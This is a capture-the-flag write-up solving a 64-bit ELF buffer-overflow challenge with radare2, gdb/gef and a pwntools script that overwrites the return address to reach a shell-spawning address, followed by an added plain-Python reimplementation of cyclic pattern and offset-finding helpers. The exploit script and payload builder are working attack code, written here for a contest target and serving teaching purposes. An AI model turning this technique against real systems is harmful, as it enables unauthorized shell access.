![2d1d58afb31029ae613b942ee8482bae.png](2c113d703dca483d8e2c197611f081b3.png)
Taking a look at the file, we can see that it's a **64-bit ELF** binary:
```
pwnchal: ELF 64-bit LSB executable, x86-64, version 1 (SYSV),
```
Nothing really stands out when analyzing with **radare2**. There is no win function this time, so let's take a look at the **vuln** function.
![b70c51cd1881ecdc338d7b53d643a415.png](8d4f2fbb719449f7a1c6844c832b8b91.png)
Looks like there's an address that gives us a shell. Let's skip all the checks and just jump straight to that.
Loading the binary into **gdb** (with the gef extension), we can start poking at it and try to find the offset.
I was having issues with `pattern create/search`, so I did it the old-fashioned way: sending lots of 'A's and 'B's until something looked neat.
Using **gdb with gef**, you can use `pi print('A'*100)` to quickly toss together a string of characters.
After sending different lengths, I found that **40** was where we started seeing the 'B' characters leak in:
`pi print('A'*40 + 'B')`
![180143eea7ff9f522522baac11c964d9.png](7f249bdae6ae4472aea3b063740f195a.png)
Things we know:
1. It's a **64-bit ELF** binary
2. The address we want to jump to is 0x004011a1
3. The offset is 40
Here's my script using **pwntools**:
```python
from pwn import *

p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io', 7480)

offset = b'A' * 40                    # padding up to the saved return address
p.recvuntil(b'dreaming?\n')           # wait for the prompt (bytes, not str, under Python 3)
p.sendline(offset + p64(0x004011a1))  # overwrite the return address with the shell-spawning code
p.interactive()                       # hand the shell over to us
```
The `p64(0x004011a1)` call packs the address in **little-endian** byte order, which is how it has to be laid out on the stack, and `p.interactive()` hands the resulting shell over to us so we can send input.
![a1b9d579310f2aef21cded3a2d701bd0.png](11afecc367004cbc991ee0df833aa92e.png)
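To show what gef's `pattern create` / `pattern search` do under the hood (the step done by hand above with 'A's and 'B's) and how `p64` lays the address out, here is an added example in plain Python; it is not code from this writeup, gef or pwntools, and the names `cyclic`, `cyclic_find` and `build_payload` are my own.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
SUBSEQ = 4  # every 4-byte window of the pattern is unique, so any window pins down its offset

def de_bruijn(alphabet=ALPHABET, n=SUBSEQ):
    """Return the de Bruijn sequence B(k, n) as bytes (Lyndon-word construction)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)

_PATTERN = de_bruijn()

def cyclic(length):
    """First `length` bytes of the pattern, like gef's `pattern create`."""
    return _PATTERN[:length]

def cyclic_find(chunk):
    """Offset of `chunk` within the pattern, like gef's `pattern search`.
    Accepts the raw bytes that ended up on the stack, or the integer gdb shows
    for a register (which is those bytes read little-endian, so repack them)."""
    if isinstance(chunk, int):
        chunk = struct.pack("<Q", chunk)
    return _PATTERN.find(chunk[:SUBSEQ])

def p64(addr):
    """Pack a 64-bit address little-endian, the same thing pwntools' p64 does."""
    return struct.pack("<Q", addr)

def build_payload(offset, addr):
    """Padding up to the saved return address, then the packed target address."""
    return b"A" * offset + p64(addr)
```

With the writeup's numbers, `cyclic_find(cyclic(100)[40:48])` returns 40, and `build_payload(40, 0x4011a1)` ends in the bytes `a1 11 40 00 00 00 00 00`.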
---
Tags: #ctf #exploit_development #buffer_overflow #gdb #gef